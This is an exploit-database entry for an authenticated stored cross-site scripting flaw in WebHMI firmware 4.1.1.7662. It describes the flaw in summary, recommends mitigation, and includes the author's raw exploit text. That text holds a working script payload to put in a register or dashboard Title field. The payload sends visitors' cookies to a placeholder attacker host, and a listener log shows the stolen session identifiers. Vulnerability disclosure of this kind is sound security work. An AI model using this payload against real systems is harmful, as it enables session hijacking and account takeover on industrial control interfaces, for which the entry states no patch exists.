WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)

vendor:

WebHMI

by:

Antonio Cuomo (arkantolo)

5.5

CVSS

MEDIUM

Stored Cross Site Scripting (XSS)

CWE

Product Name: WebHMI

Affected Version From: WebHMI Firmware 4.1.1.7662

Affected Version To: WebHMI Firmware 4.1.1.7662

Patch Exists: NO

Related CWE:

CPE: a:webhmi:webhmi:4.1.1.7662

Metasploit:

Other Scripts:

Platforms Tested:

2022

WebHMI 4.1 – Stored Cross Site Scripting (XSS) (Authenticated)

The WebHMI 4.1 application is vulnerable to stored cross-site scripting (XSS) attacks. An authenticated attacker can inject malicious scripts into the Title field of a new register or a created dashboard, which will be executed when viewed by other logged-in users.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and implement proper output encoding to prevent the execution of malicious scripts.

Source

Exploit-DB raw data:

# Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 04/01/2022
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://webhmi.com.ua/en/
# Version: WebHMI Firmware 4.1.1.7662
# Tested on: WebHMI Firmware 4.1.1.7662

#Steps to Reproduce

1. Login to admin account

2. Add a new register or create new dashboard
insert payload 

<script>var i=new Image;i.src="http://ATTACKERIP/?"+document.cookie;</script> 

in Title field and save.

# Dashboard section impact instantly all logged users.

#Listener log:
GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1
Host: 192.168.0.169:8080
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-GPC: 1
Referer: http://192.168.0.153/
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7